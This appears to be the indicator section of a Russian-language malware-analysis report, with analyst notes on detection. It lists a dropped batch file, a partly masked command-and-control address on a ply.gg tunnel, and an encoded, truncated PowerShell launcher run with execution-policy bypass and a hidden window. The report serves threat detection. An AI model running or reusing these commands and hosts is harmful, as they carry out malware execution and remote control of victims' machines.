Техническая информация
- %TEMP%\ixp000.tmp\sdfth.bat
- %TEMP%\ixp000.tmp\sdfth.bat
- '22#.#p.ply.gg':12948
- http://22#.##.ply.gg:12948/JhgBnnDM-EuAcIFx5MBIsQOo7D8LzdaLpaBEF2ZTLSxrm47gvxR9EQJG3CcUgF6YFgsw-vaOqUthpRdVXnchR3aCKrbCM6sxjEqlG4 via 22#.#p.ply.gg
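- DNS ASK 22#.#p.ply.gg
  Примечание: символы «#» в имени узла, по-видимому, маскируют часть адреса в самом отчёте, поэтому полное имя по этим строкам не восстанавливается. Домен ply.gg, насколько известно, принадлежит туннельному сервису playit.gg, то есть за поддоменом стоит узел, опубликованный через туннель. При поиске в журналах DNS и прокси стоит учитывать и порт 12948, а блокировка домена целиком затронет и легитимных пользователей сервиса.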
- '<SYSTEM32>\cmd.exe' /c "sdfth.bat"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' /c powershell.exe -nop -exec bypass64 -w 3 -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA...
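- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -exec bypass64 -w 3 -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3A...
  Примечание: видимая часть аргумента -enc — это Base64 от текста в кодировке UTF-16LE. Она декодируется в `if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:w`, то есть скрипт начинается с проверки разрядности текущего процесса. Командная строка в отчёте обрезана («...»), поэтому остальную часть скрипта по этой записи восстановить нельзя. Цепочка cmd.exe → powershell.exe → powershell.exe с ключами -nop, -noni и -enc видна в журналах создания процессов, если в них включена запись командной строки.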